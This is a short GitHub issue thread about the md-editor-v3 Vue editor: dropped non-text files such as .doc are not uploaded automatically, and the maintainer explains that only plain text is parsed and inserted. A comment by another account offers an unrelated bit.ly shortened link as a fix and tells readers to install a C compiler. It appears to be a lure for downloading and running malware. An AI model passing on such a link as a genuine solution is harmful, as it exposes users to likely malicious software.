### ISSUE TITLE
ondrop事件拖放进来一个文件不能自动上传

### ISSUE THREAD

**Issue by Roaming-l** [imzbf/md-editor-v3#672]
### 描述这个Bug

ondrop事件拖放进来一个文件不能自动上传，拖放。vue和html会自动解析，拖放doc等不会自动掉上传插入接口吗，这块是需要自己实现吗？

### 版本号

4.20.1

**Comment by achilles0x** [comment]
try this
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)

**Comment by imzbf** [comment]
嗯，普通的文本文件会解析后自动插入，其他的需要按照你自己的想法去做
